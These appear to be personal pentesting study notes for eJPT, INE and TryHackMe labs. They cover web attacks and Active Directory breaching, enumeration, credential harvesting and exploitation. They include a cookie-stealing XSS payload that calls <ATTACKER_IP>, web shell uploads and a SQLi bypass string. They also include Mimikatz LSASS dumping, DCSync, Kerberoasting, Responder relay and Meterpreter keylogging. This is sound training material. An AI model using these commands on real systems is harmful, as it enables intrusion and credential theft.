<script>var i = new Image();i.src="http://<ATTACKER_IP>/log.php?q="+document.cookie;</script>

Copy# XSSer - automated XSS testing
xsser --url 'http://<TARGET>/page.php?param=XSS' --auto
xsser --url 'http://<TARGET>/page.php?param=XSS' --Fp "<script>alert(1)</script>"

# Authenticated XSSer (with cookies)
xsser --url "http://<TARGET>/page.php?param=XSS" --cookie="PHPSESSID=abc123" --Fp "<script>alert(1)</script>"

Login Brute-Forcing with Hydra

Use case: Brute-force web login forms. The key is getting the http-post-form syntax right. This was Flag 3 in Web App CTF 1.

Copyhydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \
      -P /root/Desktop/wordlists/100-common-passwords.txt \
      <TARGET> \
      http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid username or password"

File Upload via PUT/WebDAV

Copy# Upload a web shell if PUT is allowed
curl http://<TARGET>/uploads/ --upload-file /usr/share/webshells/php/simple-backdoor.php

# Access the shell via browser
firefox http://<TARGET>/uploads/simple-backdoor.php?cmd=whoami

# URL-encoded commands (spaces = +, / = %2F, & = %26)
# Example: cd ../../ && ls -al
GET /uploads/simple-backdoor.php?cmd=cd+..%2F..+%26%26+ls+%2Dal HTTP/1.1

# Delete the shell when done
curl -X DELETE http://<TARGET>/uploads/simple-backdoor.php

4.5 WordPress Attacks

Use case: WordPress powers ~40% of websites. The eJPT tests plugin enumeration, user enumeration, brute-forcing, and shell upload via theme editor.

Key Paths

WPScan

Copywpscan --url http://<TARGET> -e u          # enumerate users
wpscan --url http://<TARGET> -e vp         # vulnerable plugins
wpscan --url http://<TARGET> -e p          # all plugins
wpscan --url http://<TARGET> --passwords rockyou.txt    # brute-force logins

Gobuster Fallback for Plugin Enumeration

Use case: When WPScan or Nmap's http-wordpress-enum script fails (like in Exploitation CTF 1), use Gobuster with the Nmap plugin wordlist.

Copygobuster dir -u http://<TARGET>/wp-content/plugins/ -w /usr/share/nmap/nselib/data/wp-plugins.lst

Shell Upload via Metasploit

Copyuse exploit/unix/webapp/wp_admin_shell_upload
set USERNAME admin
set PASSWORD <password>
set TARGETURI /wordpress
run

4.6 Drupal Attacks

Use case: Check /CHANGELOG.txt for version, then exploit Drupalgeddon2 (CVE-2018-7600) if Drupal < 7.58.

Copy# Version detection
curl http://<TARGET>/CHANGELOG.txt | head -2

# Drupalgeddon2 via Metasploit
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS <TARGET>
run

# Post-exploitation - find DB credentials
find / -name settings.php -exec grep "database\|username\|password\|host" {} \; 2>/dev/null

4.7 HTTP Lab Quick Reference

Commands from INE HTTP labs - fast reference for exam-day.

Copy# Basic web recon workflow
tar=target.ine.local
nmap -sV -p 80,443 $tar
dirb http://$tar
whatweb http://$tar
curl http://$tar/robots.txt

# Burp Suite workflow
# 1. Set FoxyProxy to Burp
# 2. Proxy → Intercept On → browse the site
# 3. HTTP History → right-click → Send to Repeater
# 4. Modify requests in Repeater → Send

# Upload a web shell (if PUT/WebDAV allowed)
curl http://$tar/uploads/ --upload-file /usr/share/webshells/php/simple-backdoor.php
firefox http://$tar/uploads/simple-backdoor.php?cmd=whoami &

# SQLi auth bypass
# Username: admin' OR 1=1 -- -
# Password: anything

🔗 Related Notes

• 03-Post-Exploitation
• Web Application Penetration Testing CTF 1 - INE
• 📋 Methodology Overview
• CheatSheets/Web Attacks Cheat Sheet
• 🧰 Tool Index

Tags: #ejpt #web-app #lfi #sqli #xss #brute-force #wordpress #drupal #burpsuite #http

Active Directory Basics

Room Link: TryHackMe - Active Directory Basics
Difficulty: 🟢 Easy
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: rootRS7 on Medium

🎯 Objective

Understand Microsoft Active Directory (AD) - the backbone of enterprise networks. Covers Windows domains, AD objects (users, groups, machines, OUs), Group Policy, authentication protocols (Kerberos and NetNTLM), and domain hierarchy (trees, forests, trusts).

📝 Key Concepts Learned

• Active Directory is a centralized directory service that stores all domain objects (users, computers, groups, policies)
• The Domain Controller (DC) is the server that runs AD services and handles all authentication
• Machine accounts follow the naming convention COMPUTERNAME$
• Organizational Units (OUs) are containers for applying Group Policy to specific sets of users/machines
• Kerberos is the default modern auth protocol; NetNTLM is legacy but still present
• Kerberos uses tickets (TGT → TGS) and never sends passwords over the network
• Trees share a namespace; forests join different namespaces; trusts enable cross-domain access

Task 2: Windows Domains

What is a Windows Domain?

A Windows domain is a group of users and computers managed centrally. Instead of each computer having its own user database, all credentials and policies are stored in one place - Active Directory.

Why Domains Exist

Without a domain, each computer manages its own users independently - imagine changing a password policy across 500 machines one by one. Domains centralize this into a single point of administration.

Answers

Task 3: Active Directory Objects

Core Object Types

Machine Account Naming

Machine accounts are created automatically when a computer joins the domain. They follow the pattern: computer name + $

CopyComputer: TOM-PC → Machine Account: TOM-PC$
Computer: WEBSERVER01 → Machine Account: WEBSERVER01$

Key Built-in Security Groups

Organizational Units (OUs)

OUs are containers that group objects for policy management. They define organizational structure within AD and are the target of Group Policy Objects (GPOs).

OUs vs Security Groups:
- OUs = for applying policies (GPOs)
- Security Groups = for granting permissions to resources

Answers

Task 4: Managing Users in AD

Delegation

Delegation is the process of granting a user specific admin privileges over an OU or AD object without making them a full Domain Admin. Example: allowing IT support to reset passwords for users in a specific OU.

Practical: Changing Sophie's Password

Copy# PowerShell command to reset a user's password
Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose

Then log in via RDP with Sophie's new credentials to find the flag on her desktop.

Answers

Task 5: Managing Computers in AD

Computer Categories

Computers in AD should be organized into OUs by function:

Answers

Task 6: Group Policies (GPOs)

What are GPOs?

Group Policy Objects are collections of settings applied to OUs. They can target both users and computers, enforcing configurations like:

• Password policies (minimum length, complexity, lockout)
• Software deployment
• Desktop restrictions
• Firewall rules
• Security settings

How GPOs Are Distributed

GPOs are stored in a network share called SYSVOL on the Domain Controller:

CopyC:\Windows\SYSVOL\sysvol\

All domain users have access to SYSVOL to periodically sync their GPO settings. This happens during login and at regular intervals (default: every 90 minutes).

GPO Inheritance

GPOs applied to a parent OU cascade down to child OUs. A GPO on the "Sales" OU applies to all users and computers inside it, including any nested sub-OUs.

Answers

Task 7: Authentication Methods

Kerberos (Modern Default)

Kerberos is the default authentication protocol for any modern Windows domain. It uses a ticket-based system - the user's password is never sent over the network.

Kerberos Flow

Copy1. User logs in → password hashed → sent to Key Distribution Center (KDC) on the DC
2. KDC verifies → issues a Ticket Granting Ticket (TGT)
3. User wants to access a service → presents TGT to KDC
4. KDC issues a Ticket Granting Service (TGS) ticket for that specific service
5. User presents TGS to the service → access granted

NetNTLM (Legacy)

NetNTLM is kept for backward compatibility. It uses a challenge-response mechanism:

Copy1. Client sends authentication request
2. Server sends a random challenge
3. Client encrypts the challenge with a hash of the user's password
4. Server forwards the response to the DC for verification
5. DC confirms or denies authentication

Answers

Task 8: Trees, Forests, and Trusts

Domain Hierarchy

Trust Relationships

Trusts don't automatically grant access - they simply allow it to be configured. Actual permissions still need to be assigned.

Answers

🧠 Lessons & Takeaways

AD Architecture at a Glance

CopyForest
├── Tree (thm.local)
│   ├── Domain (thm.local)
│   │   ├── OU: Domain Controllers
│   │   │   └── DC01 (runs AD, KDC, SYSVOL)
│   │   ├── OU: Workstations
│   │   │   └── PC01, PC02, PC03...
│   │   ├── OU: Servers
│   │   │   └── WEBSRV01, DBSRV01...
│   │   ├── OU: IT Department
│   │   │   └── Users: admin_phil, admin_claire
│   │   └── OU: Sales
│   │       └── Users: sophie, mike, jim
│   └── Subdomain (us.thm.local)
└── Tree (othercorp.local)
    └── Connected via Trust Relationship

Why AD Matters for Pentesting

Active Directory is the #1 target in internal network pentests because:
- Compromising the DC = owning the entire domain (all users, all machines, all data)
- Misconfigurations are extremely common (weak GPOs, over-privileged service accounts, no LAPS)
- Kerberos attacks (Kerberoasting, AS-REP Roasting) can extract crackable hashes without admin access
- Credential reuse and lateral movement make AD environments chain-exploitable
- Most enterprise networks run AD - it's what you'll encounter on real engagements

Key Things to Remember

• Machine accounts end with $ - easy to identify in logs and enumeration
• OUs are for policy (GPOs); Security Groups are for permissions (file shares, resources)
• SYSVOL is world-readable by domain users - sensitive scripts and data can leak from it
• Kerberos never sends passwords over the network - but tickets can be stolen (Pass-the-Ticket)
• NetNTLM is legacy but still present - vulnerable to relay attacks
• Trust relationships don't grant access - they allow it to be configured

🔗 Related Notes

• 📋 Methodology Overview
• Windows Privesc Cheat Sheet
• Windows Privilege Escalation - TryHackMe
• 🧰 Tool Index

Tags: #tryhackme #active-directory #windows #ejpt #completed

Breaching Active Directory

Room Link: TryHackMe - Breaching Active Directory
Difficulty: 🟡 Medium
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Jeremiah Lewis, Wesley Centers, Michael Oyewole on Medium

🎯 Objective

Learn techniques for obtaining that first set of Active Directory credentials to gain a foothold. Covers OSINT & phishing, NTLM/NetNTLM authentication attacks, LDAP pass-back attacks against network devices, NetNTLM relay/poisoning with Responder, PXE boot image exploitation via Microsoft Deployment Toolkit (MDT), and credential recovery from configuration files (McAfee). This is the "how do you get IN" room - before lateral movement and domain dominance.

📝 Key Concepts Learned

• ~90% of Fortune 1000 companies use Active Directory - it's the #1 target in enterprise pentesting
• NTLM authentication can be intercepted and relayed using Responder (man-in-the-middle)
• Network devices (printers, etc.) with LDAP config pages can be exploited via LDAP pass-back attacks
• PXE boot images can contain domain credentials - extract them with PowerPXE
• Application configuration databases (McAfee, etc.) often store encrypted credentials that can be decrypted
• Getting that FIRST set of AD credentials is the hardest part - after that, lateral movement becomes much easier

Task 1-2: Introduction, OSINT & Phishing

AD Breaching Methods Overview

Task 3: NTLM and NetNTLM

How NetNTLM Works

NTLM is the authentication protocol in AD. NetNTLM uses a challenge-response scheme:

Copy1. Client sends authentication request to application
2. Application forwards challenge to Domain Controller
3. Client responds with encrypted challenge (using their password hash)
4. DC verifies the response
5. Application grants/denies access

The application acts as a middle man - it never sees the actual password, only the challenge-response.

Key Concepts

Answers

Task 4: LDAP Bind Credentials (Pass-Back Attack)

Concept

Network devices (printers, scanners, etc.) often authenticate against AD via LDAP. If you can access the device's configuration page, you can redirect the LDAP server setting to your own rogue LDAP server and capture credentials in cleartext.

Walkthrough

1. Find the device's web config - the printer's LDAP settings page shows pre-filled credentials

2. Change the LDAP server IP to your attack box (use the correct interface - breachad, not your main IP):

Copyip a    # Find the breachad interface IP (10.50.x.x)

3. Set up a rogue LDAP server using OpenLDAP configured to only accept PLAIN/LOGIN auth:

Copysudo service slapd stop    # Free port 389
sudo dpkg-reconfigure -p low slapd

Configuration: DNS domain = za.tryhackme.com, Organization = za.tryhackme.com, DB type = MDB

4. Force insecure authentication by creating an LDIF file:

Copy#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred

Apply and restart:

Copysudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart

Verify:

Copyldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
# Should show: PLAIN and LOGIN only

5. Capture credentials when "Test Settings" is clicked on the printer:

Copysudo tcpdump -SX -i breachad tcp port 389

The password appears in cleartext in the tcpdump output.

Answers

Task 5: Authentication Relays (Responder)

Concept

Responder poisons NetNTLM authentication requests on the network, performing a man-in-the-middle attack. When a machine tries to authenticate (e.g., browsing to a share), Responder intercepts and captures the NTLMv2 hash.

Walkthrough

1. Run Responder:

Copysudo responder -I breachad

2. Wait 5-15 minutes for a simulated authentication request - Responder captures an NTLMv2-SSP hash

3. Save the hash to a text file and copy to the task5 directory

4. Crack with Hashcat:

Copyhashcat -m 5600 hash.txt passwordlist.txt --force

-m 5600 = NTLMv2-SSP hash type

Answers

Task 6: Microsoft Deployment Toolkit (MDT/PXE Boot)

Concept

MDT manages Windows deployment images via PXE (Pre-boot Execution Environment). PXE boot images can contain domain credentials for automated deployment. If we can access the PXE boot server, we can extract these credentials.

Walkthrough

1. Find the BCD file - browse to http://pxeboot.za.tryhackme.com/ and copy the x64 BCD file path (NOT the UEFI one)

2. SSH into the jump host:

Copyssh [email protected]
# Password: Password1@

3. Download the BCD file via TFTP:

Copytftp -i <THMMDT_IP> GET "\Tmp\x64{YOUR_BCD_FILE}.bcd" conf.bcd

4. Use PowerPXE to find the boot image location:

Copypowershell -executionpolicy bypass
Import-Module .\PowerPXE.ps1
$BCDFile = "conf.bcd"
Get-WimFile -bcdFile $BCDFile

5. Download the boot image:

Copytftp -i <THMMDT_IP> GET "\Boot\x64\Images\LiteTouchPE_x64.wim" pxeboot.wim

6. Extract credentials from the WIM file:

CopyGet-FindCredentials -WimFile pxeboot.wim

Answers

Task 7: Configuration Files

Concept

Applications installed in the domain often store credentials in configuration files or databases. McAfee's agent database (ma.db) stores encrypted credentials that can be decrypted with known tools.

Walkthrough

1. Find the database (via SSH on THMJMP1):

Copycd C:\ProgramData\McAfee\Agent\DB
dir

2. Copy to your attack box:

Copyscp [email protected]:C:/ProgramData/McAfee/Agent/DB/ma.db ma.db
# Password: Password1@

3. Open with SQLite Browser:

Copysqlitebrowser ma.db

Navigate to Agent_repositories table and copy the password hash.

4. Decrypt with the McAfee decryption tool:

Copycd /root/Rooms/BreachingAD/Task7/mcafee-sitelist-pwd-decryption-master
python2 mcafee_sitelist_pwd_decrypt.py <PASSWORD_HASH>

Answers

🧠 Lessons & Takeaways

AD Breaching Techniques Summary

AD Attack Lifecycle

CopyBREACHING (this room)
  ├── Get first set of credentials
  │   ├── OSINT / Phishing
  │   ├── NetNTLM relay (Responder)
  │   ├── LDAP pass-back
  │   ├── PXE boot exploitation
  │   └── Config file mining
  │
ENUMERATION (next step)
  ├── BloodHound, PowerView, ldapsearch
  │
EXPLOITATION
  ├── Kerberoasting, AS-REP Roasting
  ├── Pass-the-Hash, Pass-the-Ticket
  ├── DCSync, Golden Ticket
  │
POST-EXPLOITATION
  └── Persistence, domain dominance

Mitigations (Defense Perspective)

🔗 Related Notes

• Active Directory Basics - TryHackMe
• Alfred - TryHackMe
• Password Attacks Cheat Sheet
• Windows Privesc Cheat Sheet
• Methodology Overview
• INE Lab Index
• 🧰 Tool Index

Tags: #tryhackme #active-directory #authentication #ldap #ntlm #windows #ejpt #completed

Credentials Harvesting

Room Link: TryHackMe - Credentials Harvesting
Difficulty: 🟡 Medium
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Hazem Mohy on Medium

🎯 Objective

A comprehensive guide to every major credential harvesting technique on Windows and Active Directory. Covers cleartext file searching, SAM database extraction (VSS, registry hives, hashdump), LSASS memory dumping (Mimikatz, ProcDump, Task Manager), Windows Credential Manager, NTDS.dit extraction from Domain Controllers, DCSync, LAPS, Kerberoasting, AS-REP Roasting, SMB relay, and LLMNR/NBNS poisoning.

📝 Key Concepts Learned

• Credentials can be found in cleartext files, registries, databases, memory, password managers, AD, and network traffic
• SAM database holds local account hashes - extract via VSS, registry hives, or Metasploit hashdump
• LSASS memory holds live credentials for all logged-in users - dump with Mimikatz, ProcDump, or Task Manager
• LSA Protection (RunAsPPL) blocks LSASS access - Mimikatz's mimidrv.sys driver can disable it
• NTDS.dit is the AD master database - extract locally with ntdsutil or remotely with DCSync
• Kerberoasting targets SPN accounts; AS-REP Roasting targets accounts without pre-authentication
• LAPS stores local admin passwords in AD - only specific groups can read them

Task 3: Credential Access - Where Credentials Live

Searching Cleartext Files

Copy# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

# PowerShell command history
type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# Search AD user descriptions for passwords
Get-ADUser -Filter * -Properties * | Select Name,SamAccountName,Description

Task 4: Local Windows Credentials (SAM)

Method 1: Volume Shadow Copy (VSS)

Copy# Create shadow copy (run as Admin)
wmic shadowcopy call create Volume='C:\'

# List shadow copies
vssadmin list shadows

# Copy SAM + SYSTEM from shadow
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\Users\Administrator\Desktop\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\Users\Administrator\Desktop\system

Method 2: Registry Hives

Copyreg save HKLM\sam C:\Users\Administrator\Desktop\sam-reg
reg save HKLM\system C:\Users\Administrator\Desktop\system-reg

Method 3: Metasploit Hashdump

Copymeterpreter > hashdump

Decrypting with Impacket

Copysecretsdump.py -sam sam -system system LOCAL

Task 5: LSASS Memory Dumping

LSASS stores live authentication data for all logged-in users: cleartext passwords, NTLM hashes, and Kerberos tickets.

Bypassing LSA Protection

Copymimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove

Dumping with Mimikatz

Copymimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

Dumping with ProcDump

Copyprocdump.exe -accepteula -ma lsass.exe lsass_dump

Dumping via Task Manager (GUI)

Task Manager → Details → right-click lsass.exe → Create dump file

Offline Analysis

Transfer .DMP to attacker machine, then:

Copymimikatz # sekurlsa::minidump lsass.DMP
mimikatz # sekurlsa::logonpasswords

Task 6: Windows Credential Manager

Enumerate Vaults

Copyvaultcmd /list
VaultCmd /listproperties:"Web Credentials"
VaultCmd /listcreds:"Web Credentials"

Dump Web Credentials (PowerShell)

CopyImport-Module C:\Tools\Get-WebCredentials.ps1
Get-WebCredentials

Stored Credentials with cmdkey + runas

Copycmdkey /list
runas /savecred /user:THM.red\thm-local cmd.exe

Credential Manager via Mimikatz

Copymimikatz # sekurlsa::credman

Task 7: Domain Controller - NTDS.dit

Local Extraction (ntdsutil)

Copypowershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

Creates c:\temp\Active Directory\ntds.dit and c:\temp\registry\SYSTEM + SECURITY.

Decrypt with secretsdump

Copysecretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit local

Remote DCSync

Copysecretsdump.py -just-dc-ntlm THM.red/admin@<DC_IP>

Cracking NTLM Hashes

Copyhashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt
# or
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Task 8: LAPS (Local Administrator Password Solution)

Background

GPP (Group Policy Preferences) used to store local admin passwords encrypted in SYSVOL - Microsoft published the AES key, making them trivially decryptable. LAPS replaced this in 2015.

LAPS stores the local admin password in the AD attribute ms-mcs-AdmPwd (cleartext, but access-controlled).

Enumerate LAPS

Copydir "C:\Program Files\LAPS\CSE"
powershell Get-Command *AdmPwd*
powershell Find-AdmPwdExtendedRights -Identity THMorg

Read LAPS Password

Requires membership in the LAPS reader group:

CopyGet-AdmPwdPassword -ComputerName <target_machine>

Task 9: AD Credential Attacks

Kerberoasting

Target accounts with SPNs - request TGS tickets and crack them offline.

Copy# Find SPN accounts
GetUserSPNs.py -dc-ip <DC_IP> THM.red/thm

# Request TGS for specific user
GetUserSPNs.py -dc-ip <DC_IP> THM.red/thm -request-user svc-thm

# Crack the TGS
hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

AS-REP Roasting

Target accounts with "Do not require Kerberos pre-authentication" enabled.

CopyGetNPUsers.py -dc-ip <DC_IP> thm.red/ -usersfile /tmp/users.txt

# Crack the AS-REP
hashcat -a 0 -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

SMB Relay

Requires SMB Signing disabled. Capture and relay NTLM authentication.

LLMNR/NBNS Poisoning

Spoof responses to local name resolution queries - victims send auth to attacker.

🧠 Lessons & Takeaways

Credential Harvesting Methods Summary

Credential Extraction Decision Tree

CopyGot SYSTEM/Admin on a workstation?
  ├── SAM hashes → reg save / VSS / hashdump
  ├── LSASS memory → Mimikatz / ProcDump
  ├── Credential Manager → vaultcmd / sekurlsa::credman
  └── Cleartext files → reg query / history / configs

Got Domain Admin?
  ├── NTDS.dit → ntdsutil (local) or secretsdump (DCSync)
  ├── LAPS passwords → Get-AdmPwdPassword
  └── All of the above

Got any domain user?
  ├── Kerberoasting → GetUserSPNs.py
  ├── AS-REP Roasting → GetNPUsers.py
  └── LLMNR/SMB Relay → Responder + ntlmrelayx

Got network access only?
  └── LLMNR/NBNS Poisoning → Responder

Hashcat Mode Reference

🔗 Related Notes

• Breaching Active Directory - TryHackMe
• Enumerating Active Directory - TryHackMe
• Lateral Movement and Pivoting - TryHackMe
• Exploiting Active Directory - TryHackMe
• Persisting Active Directory - TryHackMe
• Metasploit Meterpreter - TryHackMe
• Password Attacks Cheat Sheet
• Windows Privesc Cheat Sheet
• 📋 Methodology Overview
• 🧰 Tool Index

Tags: #tryhackme #credentials #active-directory #mimikatz #kerberoasting #windows #ejpt #completed

Enumerating Active Directory

Room Link: TryHackMe - Enumerating Active Directory
Difficulty: 🟡 Medium
Type: Premium (Subscriber)
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: RosanaFSS on Medium

🎯 Objective

After obtaining initial AD credentials (from Breaching Active Directory - TryHackMe), learn how to enumerate the AD domain structure using four different methods: Microsoft Management Console (MMC), Command Prompt (net commands), PowerShell AD-RSAT cmdlets, and BloodHound/SharpHound. Covers credential injection, OU structure mapping, user/group enumeration, password policy discovery, and attack path identification.

📝 Key Concepts Learned

• AD enumeration is the bridge between breaching and exploitation - you need to map the domain before attacking it
• runas.exe /netonly injects credentials for network authentication without a domain-joined machine
• MMC provides a visual GUI for exploring AD structure (OUs, users, groups, computers)
• net user/group/accounts /domain gives quick CLI enumeration from any domain-joined machine
• PowerShell's Get-ADUser, Get-ADGroup, Get-ADDomain provide the most detailed programmatic enumeration
• BloodHound + SharpHound visualizes attack paths, Kerberoastable accounts, and admin relationships
• AD enumeration is extremely hard to defend against - most techniques mimic normal network traffic

Task 2: Credential Injection

runas.exe

Inject AD credentials into memory to authenticate against domain resources from your attack machine:

Copyrunas.exe /netonly /user:za.tryhackme.com\<username> cmd.exe

• /netonly - credentials used for network connections only (not local auth)
• This spawns a new cmd.exe with the injected credentials

Verify Access

Copydir \\za.tryhackme.com\SYSVOL

SYSVOL is a network folder on every Domain Controller accessible by any authenticated AD account. It stores Group Policy Objects (GPOs).

Answers

Task 3: Enumeration via MMC (GUI)

Microsoft Management Console with the AD snap-ins provides a visual interface for exploring the domain.

Key Findings

Task 4: Enumeration via Command Prompt

Essential net Commands

Copy# List all domain users
net user /domain

# Get details on a specific user
net user <username> /domain

# List all domain groups
net group /domain

# Get members of a specific group
net group "<Group Name>" /domain

# View password policy
net accounts /domain

Answers

Task 5: Enumeration via PowerShell (AD-RSAT)

Essential PowerShell Cmdlets

Copy# Get specific user with ALL properties
Get-ADUser -Identity <username> -Properties *

# Search for users by display name
Get-ADUser -Filter 'DisplayName -like "*manning"' -Server za.tryhackme.com

# Get specific group with all properties
Get-ADGroup -Filter 'DisplayName -like "Tier 1*"' -Server za.tryhackme.com -Properties *

# Get domain information
Get-ADDomain -Server za.tryhackme.com

# Get all users in a specific OU
Get-ADUser -SearchBase "OU=Marketing,OU=People,DC=za,DC=tryhackme,DC=com" -Filter *

# Get group members
Get-ADGroupMember -Identity "Tier 1 Admins" -Server za.tryhackme.com

Answers

Task 6: Enumeration via BloodHound

SharpHound Collection

SharpHound is BloodHound's data collector - it queries AD and outputs JSON files for analysis.

Copy# Collect session info only (stealthier)
Sharphound.exe --CollectionMethods Session --Domain za.tryhackme.com --ExcludeDCs

# Collect everything (noisier)
Sharphound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

Key flags:
- --CollectionMethods - what data to collect (All, Session, Group, ACL, etc.)
- --Domain - target domain
- --ExcludeDCs - don't touch Domain Controllers (stealth)

Transfer and Import

Copy# Copy the zip from target to attacker
scp <user>@thmjmp1.za.tryhackme.com:C:/Users/<user>/<filename>.zip .

Drag the .zip file into BloodHound's GUI to import.

BloodHound Analysis

Use the Pre-Built Analytics Queries under the Analysis tab:

Answers

🧠 Lessons & Takeaways

AD Enumeration Methods Comparison

AD Enumeration Cheat Sheet

Copy# === COMMAND PROMPT ===
net user /domain                          # List all users
net user <user> /domain                   # User details
net group /domain                         # List all groups
net group "<Group>" /domain               # Group members
net accounts /domain                      # Password policy

# === POWERSHELL ===
Get-ADUser -Identity <user> -Properties *                    # User details
Get-ADUser -Filter * -SearchBase "OU=...,DC=..." | Select Name  # Users in OU
Get-ADGroup -Filter * -Server <DC>                           # All groups
Get-ADGroupMember -Identity "<Group>"                        # Group members
Get-ADDomain -Server <DC>                                    # Domain info

# === BLOODHOUND ===
Sharphound.exe --CollectionMethods All --Domain <domain> --ExcludeDCs
# Import .zip into BloodHound GUI → Analysis → Pre-Built Queries

Where This Fits in the AD Attack Lifecycle

CopyBREACHING  → Breaching Active Directory - TryHackMe
  ↓ (first credentials obtained)
ENUMERATION → THIS ROOM
  ↓ (domain structure mapped, attack paths identified)
EXPLOITATION → Kerberoasting, AS-REP Roasting, Pass-the-Hash
  ↓
POST-EXPLOITATION → DCSync, Golden Ticket, Persistence

Additional Tools Not Covered in This Room

🔗 Related Notes

• Active Directory Basics - TryHackMe
• Breaching Active Directory - TryHackMe
• Alfred - TryHackMe
• Windows Privesc Cheat Sheet
• 📋 Methodology Overview
• 📋 INE Lab Index
• 🧰 Tool Index

Tags: #tryhackme #active-directory #enumeration #bloodhound #powershell #windows #ejpt #completed

Exploiting Active Directory

Room Link: TryHackMe - Exploiting Active Directory
Difficulty: 🔴 Hard
Type: Premium (Subscriber)
Date Started:
Date Completed:
Status: #in-progress
Walkthrough Source: Rich (HappyCamper84) on Medium

🎯 Objective

The culmination of the AD attack chain. After breaching, enumerating, and moving laterally, now exploit AD misconfigurations to achieve Domain Admin and Enterprise Admin. Covers DACL abuse (GenericWrite, GenericAll), Constrained Delegation, SMB relay (ntlmrelayx), abusing user behavior (keylogging/KeePass), GPO exploitation, AD Certificate Services (AD CS) abuse, and domain trust escalation via Golden Ticket forging to Enterprise Admin.

📝 Key Concepts Learned

• DACLs (Discretionary Access Control Lists) control who can modify AD objects - GenericWrite/GenericAll = full object control
• Constrained Delegation allows a service to impersonate users to specific services - abusable with Kekeo + Mimikatz
• SMB relay attacks require SMB signing to be disabled (default on workstations)
• GPO abuse lets you add users to admin groups across entire OUs
• AD Certificate Services (AD CS) misconfiguration can grant Domain Admin via certificate forgery
• Golden Ticket + child domain krbtgt hash + parent SID-519 = Enterprise Admin across forest

Task 2: DACL Abuse

Concept

DACLs define who can do what to AD objects. Dangerous ACEs include:

Walkthrough

1. Use BloodHound to identify DACL-based attack paths
2. Add yourself to a privileged group (e.g., "IT Support") via GenericWrite/Self
3. Reset a Tier 2 admin's password via ExtendedRight
4. RDP as the T2 admin to access the flag

Copy# Add yourself to a group
Add-ADGroupMember -Identity "IT Support" -Members <your_account>

# Reset another user's password
Set-ADAccountPassword -Identity <target> -Reset -NewPassword (ConvertTo-SecureString "Password00!!" -Force)

Answers

Task 3: Constrained Delegation

Concept

Constrained Delegation allows a service account to impersonate any user to specific services. If you compromise the service account, you can forge tickets to access those services as any user (including admins).

Delegation Types

Key Service: CIFS

CIFS (Common Internet File System) delegation allows file system access via delegation - this is extremely dangerous.

Walkthrough

1. Extract service account credentials from LSASS secrets (Mimikatz)
2. Find accounts with Constrained Delegation enabled
3. Use Kekeo to request a TGT, then forge S4U tickets for admin users
4. Use Mimikatz to inject the tickets
5. PSSession into the target

Copy# Find delegation accounts
Get-ADUser -Filter {TrustedToAuthForDelegation -eq $true} -Properties * | Select SamAccountName, TrustedToAuthForDelegation

Copy# Kekeo - request TGT then S4U tickets
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
tgs::s4u /tgt:<TGT.kirbi> /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
tgs::s4u /tgt:<TGT.kirbi> /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

Copy# Mimikatz - inject tickets
Invoke-Mimikatz -Command '"kerberos::ptt <http_ticket.kirbi>" "kerberos::ptt <wsman_ticket.kirbi>"'

# Access the target
New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

Answers

Task 4: SMB Relay (ntlmrelayx)

Concept

If SMB Signing is not enforced (default on workstations), you can relay NTLM authentication from one machine to another using Responder + ntlmrelayx.

Key Facts

• Windows machine account passwords rotate every 30 days by default
• SMB Signing must not be enforced for relay attacks to work

Answers

Task 5: Abusing User Behavior

Concept

Users interact with systems in predictable ways. Keylogging via Meterpreter can capture passwords typed into applications like KeePass.

Walkthrough

1. Gain SYSTEM access via PsExec (Metasploit)
2. Migrate Meterpreter to explorer.exe running as the target user
3. Start keylogging: keyscan_start
4. Wait for the user to type their KeePass password
5. Dump keystrokes: keyscan_dump

Copy# Meterpreter
ps | grep explorer
migrate <PID>    # Must be running as target user
keyscan_start
keyscan_dump     # Repeat until password appears

Answers

Task 6: GPO Abuse

Concept

Group Policy Objects (GPOs) push configurations across OUs. If you own a GPO (or have write access), you can add users to admin groups on every machine in that OU.

Walkthrough

1. Find GPOs your compromised account owns (via BloodHound or gpmc.msc)
2. Edit the GPO → Computer Config → Policies → Security Settings → Restricted Groups
3. Add your group to Administrators and Remote Desktop Users
4. Wait ~15 minutes for Group Policy to update

Answers

Task 7: AD Certificate Services (AD CS) Abuse

Concept

AD CS is Microsoft's PKI implementation. Misconfigured certificate templates can allow any domain user to request a certificate as another user (including Domain Admin), then use that certificate to obtain a TGT.

Walkthrough

1. Request a certificate via MMC using a vulnerable template (ensure you select "Computer Account")
2. Export the certificate as a .pfx file
3. Use Rubeus to request a TGT using the certificate
4. Import the TGT with Mimikatz
5. Access DC resources as Administrator

Copy# Rubeus - request TGT from certificate
